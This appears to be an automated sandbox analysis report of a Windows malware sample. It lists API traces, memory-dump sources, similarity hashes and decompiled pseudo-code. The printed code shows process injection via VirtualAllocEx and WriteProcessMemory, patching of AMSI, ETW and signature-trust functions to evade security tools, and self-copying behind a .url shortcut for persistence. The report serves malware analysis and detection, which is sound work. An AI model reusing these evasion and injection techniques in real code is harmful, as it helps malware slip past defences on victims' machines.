0x004565b7 0x00000000 0x004565a5 0x00456184 0x00456184 0x00456189 0x0045620d 0x0045620d 0x00456212 0x00456220 0x00456214 0x00456214 0x00456219 0x0045622d 0x0045621b 0x00456238 0x0045623d 0x00456219 0x00000000 0x00456212 0x0045618e 0x0045618e 0x00456191 0x004563d7 0x00000000 0x004563d7 0x00456197 0x0045619c 0x004566e5 0x00000000 0x004561a2 0x00000000 0x004561a2 0x0045619c 0x004560bf 0x00000000 0x00000000 0x004560c5 0x004560c8 0x00456128 0x0045612b 0x00456153 0x00456153 0x00456156 0x004562a3 0x00000000 0x004562a3 0x0045615c 0x0045615f 0x0045640a 0x00456410 0x00456416 0x0045641c 0x0045641f 0x00456426 0x0045642c 0x0045642f 0x00456436 0x004564b6 0x00456438 0x00456447 0x0045644c 0x00456452 0x00456454 0x0045649e 0x004564a6 0x00456456 0x0045645b 0x00456472 0x00456474 0x00456476 0x00456478 0x00456481 0x0045648f 0x0045648f 0x00456478 0x00456454 0x00456436 0x00456426 0x00000000 0x00456165 0x00000000 0x00456165 0x0045615f 0x0045612d 0x004566cd 0x004566d2 0x004566d8 0x00000000 0x004566dd 0x00456133 0x00456133 0x00456136 0x004563df 0x004563e2 0x004563e6 0x004563ec 0x004563f1 0x004563f1 0x00000000 0x004563e6 0x0045613c 0x0045613c 0x0045613f 0x004566ad 0x004566b4 0x004566bf 0x004566c5 0x00000000 0x004566ca 0x00456145 0x00456148 0x004562cd 0x004562d3 0x004562d6 0x004562da 0x004562e0 0x004562e6 0x004562e9 0x004562ed 0x00456314 0x00456329 0x004562ef 0x004562f2 0x00456307 0x00456307 0x00000000 0x0045614e 0x00000000 0x0045614e 0x00456148 0x004560ca 0x00456286 0x0045628d 0x00000000 0x00456292 0x004560d0 0x004560d3 0x00000000 0x00000000 0x004560d9 0x00000000 0x004566ee 0x00000000 0x00000000 0x00000000 0x00000000 0x004562ab 0x004562ad 0x004562af 0x004562b7 0x004562ba 0x004562bb 0x004562c1 0x00000000 0x00000000 0x00456333 0x00456336 0x0045633a 0x00456377 0x0045637d 0x00456380 0x00456387 0x00456389 0x00456390 0x00456392 0x00456395 0x00456398 0x0045639d 0x004563a0 0x004563a0 0x00456390 0x004563a9 0x0045633c 0x0045633c 0x00456343 0x00456348 0x0045634d 0x00456350 0x00456356 0x00456358 0x0045635f 0x00456362 0x00456362 0x00456364 0x00456364 0x00456358 0x0045636b 0x00456370 0x00000000 0x00000000 0x0045625b 0x0045625e 0x00456261 0x00456262 0x00456267 0x00456269 0x00456278 0x0045626b 0x0045626c 0x00456271 0x00000000 0x00000000 0x00456243 0x00456246 0x00456249 0x0045624b 0x00456251 0x00456251 0x00000000 0x00000000 0x004563fb 0x004563fe 0x00000000 0x00000000 0x00456072 0x00456072 0x00456073 0x00000000 0x00456075 0x00456091 0x00000000 0x00456093 0x00456093 0x00456095 0x00456098 0x00456098 0x0045671b 0x00456721 0x004560a0 0x004560a0 0x004560a1 0x004560a1 0x004560a2 0x00000000 0x00000000 0x00000000 0x004560a2

Strings

vcltest3.dll , xrefs: 0045643D dF , xrefs: 004566AD RegisterAutomation , xrefs: 0045645E

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: String ID: RegisterAutomation$vcltest3.dll$dF API String ID: 0-2619585711 Opcode ID: bebbeda00556289de3349cc0c43b19427dd01e6f62d31d66b9211dfcce096cd8 Instruction ID: c862d983367047c7d83d43d7369f119c2f1ed98460a64e58c2bee91e03f6acd7 Opcode Fuzzy Hash: bebbeda00556289de3349cc0c43b19427dd01e6f62d31d66b9211dfcce096cd8 Instruction Fuzzy Hash: D0E18074A00204EFD700DF69C585A5EB7F1AF08315FA681AAEC049B367C739EE49DB09

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%

E00405F8C() { void* _t32; struct HINSTANCE__* _t39; struct HINSTANCE__* _t46; CHAR* _t56; CHAR* _t57; struct HINSTANCE__* _t64; void* _t66; lstrcpynA(_t66 - 0x11d, *(_t66 - 4), 0x105); GetLocaleInfoA(GetThreadLocale(), 3, _t66 - 0xd, 5); _t64 = 0; if( *(_t66 - 0x11d) == 0 || *(_t66 - 0xd) == 0 && *(_t66 - 0x12) == 0) { L14: return _t64; } else { _t56 = &((_t66 - 0x11d)[lstrlenA(_t66 - 0x11d)]); L5: if( *_t56 != 0x2e && _t56 != _t66 - 0x11d) { _t56 = _t56 - 1; goto L5; } _t32 = _t66 - 0x11d; if(_t56 != _t32) { _t57 = &(_t56[1]); if( *(_t66 - 0x12) != 0) { lstrcpynA(_t57, _t66 - 0x12, 0x105 - _t57 - _t32); _t64 = LoadLibraryExA(_t66 - 0x11d, 0, "true"); } if(_t64 == 0 && *(_t66 - 0xd) != 0) { lstrcpynA(_t57, _t66 - 0xd, 0x105 - _t57 - _t66 - 0x11d); _t39 = LoadLibraryExA(_t66 - 0x11d, 0, "true"); // executed _t64 = _t39; if(_t64 == 0) { *((char*)(_t66 - 0xb)) = 0; lstrcpynA(_t57, _t66 - 0xd, 0x105 - _t57 - _t66 - 0x11d); _t46 = LoadLibraryExA(_t66 - 0x11d, 0, "true"); // executed _t64 = _t46; } } } goto L14; } } 0x00405f9c 0x00405faf 0x00405fb4 0x00405fbd 0x004060a6 0x004060ad 0x00405fd3 0x00405fe7 0x00405fec 0x00405fef 0x00405feb 0x00000000 0x00405feb 0x00405ffb 0x00406003 0x00406009 0x0040600e 0x00406021 0x00406036 0x00406036 0x0040603a 0x00406059 0x00406069 0x0040606e 0x00406072 0x00406074 0x0040608f 0x0040609f 0x004060a4 0x004060a4 0x00406072 0x0040603a 0x00000000 0x00406003

APIs

lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00405F9C GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00405FA9 GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 00405FAF lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 00405FDA lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00406021 LoadLibraryExA.KERNEL32(?,00000000,?,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00406031 lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00406059 LoadLibraryExA.KERNEL32(?,00000000,?,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00406069 lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,?,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 0040608F LoadLibraryExA.KERNEL32(?,00000000,?,00000001,?,00000105,?,00000000,?,00000001,?,00000105,?,00000000,00000003,?), ref: 0040609F

Strings

Software\Borland\Locales , xrefs: 00405EB0, 00405ECE Software\Borland\Delphi\Locales , xrefs: 00405EEC

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales API String ID: 1599918012-2375825460 Opcode ID: 3b076b2b373c45a9159bfb3f8682f777772ce63c1bbea00a07b9ef255dfea311 Instruction ID: 056191be2cc99d761454d3f3497d73c48898f7ba8829eff3fe46ba9af11a18cc Opcode Fuzzy Hash: 3b076b2b373c45a9159bfb3f8682f777772ce63c1bbea00a07b9ef255dfea311 Instruction Fuzzy Hash: 44314D71E4021D2AFB26D6B89C46FDF7AED8B44384F4441F7A605F61C2E67C8E848B54

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 81%

E035A4794(void* __eax, void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __fp0) { intOrPtr _v12; long _v20; void* _v24; void* _v28; intOrPtr _v32; char _v33; long _v40; intOrPtr _v44; void* _v48; void* _t35; void* _t39; void* _t46; void* _t52; void* _t54; intOrPtr _t61; intOrPtr _t63; intOrPtr _t64; void* _t71; void* _t73; void* _t76; void* _t86; _t86 = __fp0; _v32 = __edx; _v28 = __eax; _t61 = *0x35a40a8; // 0x35a40ac E03594D4C( &_v24, _t61); _push(_t76); _push(0x35a4894); _push( *[fs:eax]); *[fs:eax] = _t76 + 0xffffffd4; _v33 = 0; _t71 = *((intOrPtr*)(_v32 + 0x3c)) + _v32; _t73 = 0x72000000; do { _t73 = _t73 + 0x80000; _t35 = VirtualAlloc( *((intOrPtr*)(_t71 + 0x34)) + _t73, *(_t71 + 0x50), 0x3000, 0x40); // executed _t54 = _t35; if(_t54 != 0) { VirtualFree(_t54, 0, 0x8000); // executed _t52 = VirtualAllocEx(_v28, *((intOrPtr*)(_t71 + 0x34)) + _t73, *(_t71 + 0x50), 0x3000, 0x40); // executed _t54 = _t52; } } while (_t54 == 0 && _t73 <= 0x74000000); E035A4C2C(_v28, _t54, _v32, _t54, _t71, _t73, _t86, &_v24); // executed _t39 = _v24; if(_t39 != 0) { _v48 = _t39; _v44 = _v12; WriteProcessMemory(_v28, _t54, _t39, _v20, &_v40); // executed _t46 = E035A45EC(_v28, &_v48, E035A476C, 0, 8); // executed if(_t46 != 0) { _v33 = 1; } } _pop(_t63); *[fs:eax] = _t63; _push(E035A489B); _t64 = *0x35a40a8; // 0x35a40ac return E03594E10( &_v24, _t64); } 0x035a4794 0x035a479d 0x035a47a0 0x035a47a6 0x035a47ac 0x035a47b3 0x035a47b4 0x035a47b9 0x035a47bc 0x035a47bf 0x035a47c9 0x035a47cc 0x035a47d1 0x035a47d1 0x035a47e8 0x035a47ed 0x035a47f1 0x035a47fb 0x035a4815 0x035a481a 0x035a481a 0x035a481c 0x035a4834 0x035a4839 0x035a483e 0x035a4840 0x035a4846 0x035a4857 0x035a486b 0x035a4872 0x035a4874 0x035a4874 0x035a4872 0x035a487a 0x035a487d 0x035a4880 0x035a4888 0x035a4893

APIs

VirtualAlloc.KERNEL32(?,?,00003000,00000040,00000000,035A4894,?,?,?,00000000), ref: 035A47E8 VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00003000,00000040,00000000,035A4894,?,?,?,00000000), ref: 035A47FB VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,00000000,00000000,00008000,?,?,00003000,00000040,00000000,035A4894,?,?), ref: 035A4815 WriteProcessMemory.KERNEL32(?,00000000,?,?,?,?,?,?,00003000,00000040,00000000,035A4894,?,?,?,00000000), ref: 035A4857

Memory Dump Source

Source File: 0000000A.00000002.352102663.0000000003591000.00000020.00000001.sdmp, Offset: 03590000, based on PE: true

Associated: 0000000A.00000002.352092901.0000000003590000.00000002.00000001.sdmp Download File Associated: 0000000A.00000002.352129882.00000000035A8000.00000004.00000001.sdmp Download File

Similarity

API ID: Virtual$Alloc$FreeMemoryProcessWrite String ID: API String ID: 2022580353-0 Opcode ID: 7ef8ddb58f375091295ab6ff9270805eac6c5a6c18bf044175a49b0c56bb8847 Instruction ID: ff27a24a7a5074d5f1eddd8be6cd606e7b53c4ca2c267bce7cd9ce65a3b1278b Opcode Fuzzy Hash: 7ef8ddb58f375091295ab6ff9270805eac6c5a6c18bf044175a49b0c56bb8847 Instruction Fuzzy Hash: 393143B5A00706AFDB10DBDAE891FAFB7F8FB48610F554025E504BB350D6B0E9059BA4

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 84%

E035A45BC(void* __eax, long __ecx, void* __edx) { void* _t2; void* _t5; void* _t9; long _t10; void* _t11; SIZE_T* _t12; _push(__ecx); _t10 = __ecx; _t11 = __edx; _t5 = __eax; _t2 = VirtualAllocEx(__eax, 0, __ecx, 0x3000, 0x40); // executed _t9 = _t2; WriteProcessMemory(_t5, _t9, _t11, _t10, _t12); // executed return _t9; } 0x035a45c0 0x035a45c1 0x035a45c3 0x035a45c5 0x035a45d2 0x035a45d7 0x035a45de 0x035a45ea

APIs

VirtualAllocEx.KERNEL32(0A74C085,00000000,00000018,00003000,00000040,00000018,?,00000000,00000018,0A74C085,035A49C7,00000000,kernel32.dll,ExitThread,00000000,kernel32.dll), ref: 035A45D2 WriteProcessMemory.KERNEL32(0A74C085,00000000,00000018,00000018,?,0A74C085,00000000,00000018,00003000,00000040,00000018,?,00000000,00000018,0A74C085,035A49C7), ref: 035A45DE

Memory Dump Source

Source File: 0000000A.00000002.352102663.0000000003591000.00000020.00000001.sdmp, Offset: 03590000, based on PE: true

Associated: 0000000A.00000002.352092901.0000000003590000.00000002.00000001.sdmp Download File Associated: 0000000A.00000002.352129882.00000000035A8000.00000004.00000001.sdmp Download File

Similarity

API ID: AllocMemoryProcessVirtualWrite String ID: API String ID: 645232735-0 Opcode ID: db52bdeaca576222d9dd11301522adc3dca1c45b6921b0b6e9c87c2119f8232a Instruction ID: 96832806f437ff06d28c512b3747bd66edeea890a9df84e85539da57c68cd516 Opcode Fuzzy Hash: db52bdeaca576222d9dd11301522adc3dca1c45b6921b0b6e9c87c2119f8232a Instruction Fuzzy Hash: 15D05EA634631437F53460AB7C85FA75E5CCBC7AF5E150036B70CEA191D4925C0541B8

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 88%

_entry_(void* __ebx, void* __edx, void* __edi, void* __esi, void* __fp0) { char _v68; char _v72; char _v76; char _v80; char _v84; char _v88; char _v92; intOrPtr _v96; char _v100; char _v104; intOrPtr _v108; char _v112; intOrPtr _v116; intOrPtr _v120; char _v124; char _v128; void* _v132; char _v136; char _v140; char _v144; intOrPtr _v148; char _v152; char _v168; char _v172; char _v176; char _v180; char _v184; char _v188; char _v192; intOrPtr _t105; void* _t106; intOrPtr _t114; intOrPtr _t120; intOrPtr _t150; intOrPtr _t151; intOrPtr _t153; DWORD* _t157; DWORD* _t161; DWORD* _t165; DWORD* _t169; DWORD* _t173; DWORD* _t177; DWORD* _t181; intOrPtr _t183; intOrPtr _t187; void* _t188; intOrPtr _t189; intOrPtr _t193; intOrPtr _t199; struct HINSTANCE__* _t201; intOrPtr _t216; intOrPtr _t218; intOrPtr _t279; intOrPtr _t281; intOrPtr _t286; intOrPtr _t288; void* _t294; void* _t295; intOrPtr _t297; intOrPtr _t299; void* _t302; intOrPtr _t303; void* _t304; intOrPtr _t307; intOrPtr _t328; CHAR* _t329; intOrPtr _t336; intOrPtr* _t343; intOrPtr* _t346; intOrPtr* _t354; intOrPtr _t356; intOrPtr* _t363; intOrPtr _t366; intOrPtr _t375; struct HINSTANCE__* _t382; struct HINSTANCE__* _t384; void* _t385; intOrPtr _t387; intOrPtr _t388; intOrPtr _t424; intOrPtr _t429; intOrPtr _t432; intOrPtr _t434; intOrPtr _t436; intOrPtr _t438; intOrPtr _t440; intOrPtr _t442; intOrPtr _t444; intOrPtr _t446; intOrPtr _t448; intOrPtr _t450; intOrPtr _t452; intOrPtr _t463; intOrPtr _t501; intOrPtr _t535; intOrPtr _t538; void* _t539; void* _t540; intOrPtr _t542; intOrPtr _t543; void* _t552; _t552 = __fp0; _t540 = __esi; _t539 = __edi; _t542 = _t543; _t385 = 0x17; goto L1; L7: _t388 = *0x35ad44c; // 0x1f _t389 = _t388 != 0x17; _t151 = *0x35ad3c8; // 0x3718e18 E0359483C(_t151, _t388 != 0x17, 1, 0x35ad3d4); _t153 = *0x35ad39c; // 0x36f4e78 E03594728(_t153, 0x35a76bc); if(_t388 != 0x17) { L13: E035A552C("softpub", _t382, 0x35ad374, "AddPersonalTrustDBPages", _t540); _t157 = *0x35ad374; // 0x738c4620 VirtualProtect(0x35a4e54, 8, 0x40, _t157); E035A552C("softpub", _t382, 0x35ad374, "HTTPSCertificateTrust", _t540); _t161 = *0x35ad374; // 0x738c4620 VirtualProtect(0x35a4e54, 8, 0x40, _t161); E035A552C("softpub", _t382, 0x35ad374, "SoftpubLoadSignature", _t540); _t165 = *0x35ad374; // 0x738c4620 VirtualProtect(0x35a4e54, 8, 0x40, _t165); E035A552C("softpub", _t382, 0x35ad374, "SoftpubDefCertInit", _t540); _t169 = *0x35ad374; // 0x738c4620 VirtualProtect(0x35a4e54, 8, 0x40, _t169); E035A552C("softpub", _t382, 0x35ad374, "SoftpubCheckCert", _t540); _t173 = *0x35ad374; // 0x738c4620 VirtualProtect(0x35a4e54, 8, 0x40, _t173); E035A552C("softpub", _t382, 0x35ad374, "OfficeInitializePolicy", _t540); _t177 = *0x35ad374; // 0x738c4620 VirtualProtect(0x35a4e54, 8, 0x40, _t177); *0x35ad374 = GetProcAddress(LoadLibraryA("softpub"), "DriverInitializePolicy"); _t181 = *0x35ad374; // 0x738c4620 VirtualProtect(0x35a4e54, 8, 0x40, _t181); _t463 = *0x35ad3b4; // 0x3711bd0 _t183 = *0x35ad3a4; // 0x36427c8 L035A5028(_t183, _t179, &_v168, _t463, _t539, _t540); E03594390(0x35ad3a0, _v168); _t187 = *0x35ad3cc; // 0x36f4eb8 _t188 = L035977F8(_t187, __eflags); _t397 = &_v172; _t189 = *0x35ad3a0; // 0x366b5f8 L035A5420(_t189, _t179, &_v172, _t188, _t540); E03594390(0x35ad3a8, _v172); _t193 = *0x35ad3a8; // 0x3619998 E035A5140(_t193, _t179, &_v172, &_v180, _t539, _t540); L035A54C8(_v180, &_v172, &_v176); E03594390(0x35ad3b0, _v176); _t199 = *0x35ad3c0; // 0x36f4e88 E03594728(_t199, 0x35a76bc); if(__eflags == 0) { _t297 = *0x35ad398; // 0x0 E03594728(_t297, 0x35a76bc); if(__eflags != 0) { _t299 = *0x35ad3c4; // 0x0 E03594728(_t299, 0x35a76bc); if(__eflags != 0) { _t302 = E03594834(0x35ad3b0); _t303 = *0x35ad3e4; // 0x3718de8 _t304 = E035947DC(_t303); _t397 = 0; __eflags = 0; E035A48A8(0, 0, _t304, _t302, 0x35ad438, 0x35ad3f4, 0, 0, 0x44, 0, 0); // executed } } } _t201 = LoadLibraryA("wuapi"); // executed _t384 = _t201; E0359D390("revreSretsigeRllD", _t397, &_v184); *0x35ad384 = GetProcAddress(_t384, E035947DC(_v184)); VirtualProtect(0x35a4e54, 8, 0x40, *0x35ad384); E0359D390("tcejbOssalCteGllD", _t397, &_v188); *0x35ad384 = GetProcAddress(_t384, E035947DC(_v188)); VirtualProtect(0x35a4e54, 8, 0x40, *0x35ad384); _t216 = *0x35ad398; // 0x0 E03594728(_t216, 0x35a76bc); if(__eflags == 0) { _t286 = *0x35ad3c0; // 0x36f4e88 E03594728(_t286, 0x35a76bc); if(__eflags != 0) { _t288 = *0x35ad3c4; // 0x0 E03594728(_t288, 0x35a76bc); if(__eflags != 0) { __eflags = 0; E03592F78(0, &_v192); _push(_v192); _t294 = E03594834(0x35ad3b0); _pop(_t295); E0359CB3C(_t295, _t384, _t294, _t539, _t540, _t552); } } } _t218 = *0x35ad3c4; // 0x0 E03594728(_t218, 0x35a76bc); if(__eflags == 0) { _t279 = *0x35ad398; // 0x0 E03594728(_t279, 0x35a76bc); if(__eflags != 0) { _t281 = *0x35ad3c0; // 0x36f4e88 E03594728(_t281, 0x35a76bc); if(__eflags != 0) { E0359D170(E03594834(0x35ad3b0), _t384, _t397, _t539, _t540, _t552); } } } E035A552C(0x35a77b4, _t384, 0x35ad384, "EtwEventWrite", _t540); E035A4F94(0x35a4e54); E035A552C(0x35a77dc, _t384, 0x35ad374, "AmsiScanString", _t540); E035A4F94(0x35a4e54); E035A552C(0x35a77dc, _t384, 0x35ad378, "AmsiScanBuffer", _t540); E035A4F94(0x35a4e54); E035A552C(0x35a77dc, _t384, 0x35ad37c, "AmsiOpenSession", _t540); E035A4F94(0x35a4e54); E035A552C(0x35a77dc, _t384, 0x35ad380, "AmsiUacInitialize", _t540); E035A4F94(0x35a4e54); E035A552C(0x35a77dc, _t384, 0x35ad380, "AmsiUacScan", _t540); E035A4F94(0x35a4e54); E035A552C(0x35a77dc, _t384, 0x35ad380, "DllRegisterServer", _t540); E035A4F94(0x35a4e54); E035A552C(0x35a77dc, _t384, 0x35ad380, "DllGetClassObject", _t540); E035A4F94(0x35a4e54); E035A552C(0x35a77dc, _t384, 0x35ad380, "AmsiInitialize", _t540); E035A4F94(0x35a4e54); E035A552C("amsiproxy", _t384, 0x35ad380, "DllRegisterServer", _t540); // executed E035A4F94(0x35a4e54); E035A552C("amsiproxy", _t384, 0x35ad380, "DllGetClassObject", _t540); // executed E035A4F94(0x35a4e54); E035A552C("amsiproxy", _t384, 0x35ad380, "DllCanUnloadNow", _t540); // executed E035A4F94(0x35a4e54); E035A552C("amsiproxy", _t384, 0x35ad380, "DllUnregisterServer", _t540); // executed E035A4F94(0x35a4e54); ExitProcess(0); // executed __eflags = 0; _pop(_t501); *[fs:eax] = _t501; _push(0x35a75f1); E03594360( &_v192, 0x1d); L03595488( &_v76, *0x35a4e2c); return E03594360( &_v72, 2); } else { _push( *0x35ad3dc); _push(0x35a76c8); _push("Contacts"); _push(0x35a76c8); _t307 = *0x35ad3d4; // 0x36fc338 E035A5140(_t307, _t382, _t389, &_v100, _t539, _t540); _push(_v100); _push(".url"); E0359469C(); E03594534( &_v92, E035947DC(_v96)); if(E03597B68(_v92) != 0) { goto L13; } else { _push( *0x35ad3dc); _push(0x35a76c8); _push("Contacts"); E0359469C(); E03594534( &_v104, E035947DC(_v108)); if(L03597B8C(_v104) == 0) { _push( *0x35ad3dc); _push(0x35a76c8); _push("Contacts"); E0359469C(); E03594534( &_v112, E035947DC(_v116)); L03597CEC(_v112); } E0359469C(); E03594534(0x35ad3e8, E035947DC(_v120)); _t328 = *0x35ad3e8; // 0x0 _t329 = E035947DC(_t328); E03592F78(0, &_v124); CopyFileA(E035947DC(_v124), _t329, 0xffffffff); _t336 = *0x35ad3e8; // 0x0 E035A52EC(_t336, _t382, 0x35a7708, 0x35a76c8, _t539, _t540, &_v128); E03594390(0x35ad394, _v128); *0x35ad3f0 = L035936CC(1); *[fs:eax] = _t543; _t343 = *0x35ad3f0; // 0x0 *((intOrPtr*)( *_t343 + 0x38))( *[fs:eax], 0x35a6f4a, _t542, ".exe", *0x35ad3d4, 0x35a76c8, "Contacts", 0x35a76c8, *0x35ad3dc); E0359469C(); _t346 = *0x35ad3f0; // 0x0 *((intOrPtr*)( *_t346 + 0x38))(0x35a7744, *0x35ad394, "URL=file:\""); E03593000(0x64); L035976BC( &_v140); E03594628( &_v136, _v140, "IconIndex="); _t354 = *0x35ad3f0; // 0x0 *((intOrPtr*)( *_t354 + 0x38))(); _t356 = *0x35ad3d4; // 0x36fc338 E035A5140(_t356, _t382, *_t354, &_v152, _t539, _t540); E0359469C(); E03594534( &_v144, E035947DC(_v148)); _t363 = *0x35ad3f0; // 0x0 *((intOrPtr*)( *_t363 + 0x74))(".url", _v152, 0x35a76c8, "Contacts", 0x35a76c8, *0x35ad3dc); _pop(_t535); *[fs:eax] = _t535; _push(E035A6F51); _t366 = *0x35ad3f0; // 0x0 return L035936FC(_t366); } } L1: _push(0); _push(0); _t385 = _t385 - 1; if(_t385 != 0) { goto L1; } else { _push(_t385); E03596230(0x35a563c); _push(_t542); _push(0x35a75ea); _push( *[fs:eax]); *[fs:eax] = _t543; E0359410C(0x35a5704); E03592FD8(); _t382 = LoadLibraryA("mssip32"); VirtualProtect(0x35a4e54, 8, 0x40, GetProcAddress(_t382, "CryptSIPGetRegWorkingFlags")); VirtualProtect(0x35a4e54, 8, 0x40, GetProcAddress(_t382, "CryptSIPCreateIndirectData")); VirtualProtect(0x35a4e54, 8, 0x40, GetProcAddress(_t382, "CryptSIPGetInfo")); VirtualProtect(0x35a4e54, 8, 0x40, GetProcAddress(_t382, "CryptSIPGetSignedDataMsg")); VirtualProtect(0x35a4e54, 8, 0x40, GetProcAddress(_t382, "CryptSIPPutSignedDataMsg")); VirtualProtect(0x35a4e54, 8, 0x40, GetProcAddress(_t382, "CryptSIPVerifyIndirectData")); VirtualProtect(0x35a4e54, 8, 0x40, GetProcAddress(_t382, "DllRegisterServer")); E03594534(0x35ad3d8, E035947DC( *((intOrPtr*)(0x35a8fe4 + E0359C998(1, 4) * 4)))); _t105 = *0x35ad3d8; // 0x3718de8 _t106 = E03597B68(_t105); _t545 = _t106; if(_t106 == 0) { E03592FD8(); _t424 = *0x35ad3d8; // 0x3718de8 E03594390(0x35ad3e4, _t424); } else { E03592FD8(); _t538 = *0x35ad3d8; // 0x3718de8 E03594390(0x35ad3e4, _t538); } E035A52D0(_t385, &_v68, _t545); E03594390(0x35ad3e0, _v68); _t114 = *0x35ad3e0; // 0x36bd658 L035A54C8(_t114, _t385, &_v72); E03594390(0x35ad3d0, _v72); _t429 = *0x35a8ff8; // 0x7209cc E035945C4( &_v80, _t429); _t120 = *0x35ad3d0; // 0x3694628 E035A51AC(_t120, _t382, &_v76, _v80, _t540); _t387 = *0x35a4e2c; // 0x35a4e30 L035954C4(0x35ad3bc, _t387, _v76); _t432 = *0x35ad3bc; // 0x7f9d0018 E03594390(0x35ad3b8, *((intOrPtr*)(_t432 + 4))); _t434 = *0x35ad3bc; // 0x7f9d0018 E03594390(0x35ad3b4, *((intOrPtr*)(_t434 + 8))); _t436 = *0x35ad3bc; // 0x7f9d0018 E03594390(0x35ad3c8, *((intOrPtr*)(_t436 + 0xc))); _t438 = *0x35ad3bc; // 0x7f9d0018 E03594390(0x35ad3a4, *((intOrPtr*)(_t438 + 0x10))); _t440 = *0x35ad3bc; // 0x7f9d0018 E03594390(0x35ad3ac, *((intOrPtr*)(_t440 + 0x14))); _t442 = *0x35ad3bc; // 0x7f9d0018 E03594390(0x35ad39c, *((intOrPtr*)(_t442 + 0x18))); _t444 = *0x35ad3bc; // 0x7f9d0018 E03594390(0x35ad398, *((intOrPtr*)(_t444 + 0x1c))); _t446 = *0x35ad3bc; // 0x7f9d0018 E03594390(0x35ad3c0, *((intOrPtr*)(_t446 + 0x20))); _t448 = *0x35ad3bc; // 0x7f9d0018 E03594390(0x35ad3c4, *((intOrPtr*)(_t448 + 0x24))); _t450 = *0x35ad3bc; // 0x7f9d0018 E03594390(0x35ad3cc, *((intOrPtr*)(_t450 + 0x28))); _t452 = *0x35a8ffc; // 0x77236c E035945C4( &_v88, _t452); E0359C4D4(_v88, &_v84); E03594390(0x35ad3dc, _v84); _t150 = *0x35ad3c8; // 0x3718e18 *0x35ad44c = _t150; if( *0x35ad44c != 0) { _t375 = *0x35ad44c; // 0x1f *0x35ad44c = *((intOrPtr*)(_t375 - 4)); } } goto L7; } 0x035a69e8 0x035a69e8 0x035a69e8 0x035a69e9 0x035a69eb 0x035a69eb 0x035a6cae 0x035a6cb3 0x035a6cb9 0x035a6cc1 0x035a6cc6 0x035a6ccb 0x035a6cd5 0x035a6cda 0x035a70bc 0x035a70cb 0x035a70d0 0x035a70df 0x035a70f3 0x035a70f8 0x035a7107 0x035a711b 0x035a7120 0x035a712f 0x035a7143 0x035a7148 0x035a7157 0x035a716b 0x035a7170 0x035a717f 0x035a7193 0x035a7198 0x035a71a7 0x035a71c3 0x035a71c8 0x035a71d7 0x035a71e2 0x035a71e8 0x035a71ed 0x035a71fd 0x035a7202 0x035a7207 0x035a720e 0x035a7214 0x035a7219 0x035a7229 0x035a7234 0x035a7239 0x035a724a 0x035a725a 0x035a725f 0x035a7269 0x035a726e 0x035a7270 0x035a727a 0x035a727f 0x035a7281 0x035a728b 0x035a7290 0x035a72ab 0x035a72b1 0x035a72b6 0x035a72bd 0x035a72bf 0x035a72c1 0x035a72c1 0x035a7290 0x035a727f 0x035a72cb 0x035a72d0 0x035a72dd 0x035a72f4 0x035a7308 0x035a7318 0x035a732f 0x035a7343 0x035a7348 0x035a7352 0x035a7357 0x035a7359 0x035a7363 0x035a7368 0x035a736a 0x035a7374 0x035a7379 0x035a7381 0x035a7383 0x035a738e 0x035a7394 0x035a739b 0x035a739c 0x035a739c 0x035a7379 0x035a7368 0x035a73a1 0x035a73ab 0x035a73b0 0x035a73b2 0x035a73bc 0x035a73c1 0x035a73c3 0x035a73cd 0x035a73d2 0x035a73de 0x035a73de 0x035a73d2 0x035a73c1 0x035a73f2 0x035a7401 0x035a7415 0x035a7424 0x035a7438 0x035a7447 0x035a745b 0x035a746a 0x035a747e 0x035a748d 0x035a74a1 0x035a74b0 0x035a74c4 0x035a74d3 0x035a74e7 0x035a74f6 0x035a750a 0x035a7519 0x035a752d 0x035a753c 0x035a7550 0x035a755f 0x035a7573 0x035a7582 0x035a7596 0x035a75a5 0x035a75ac 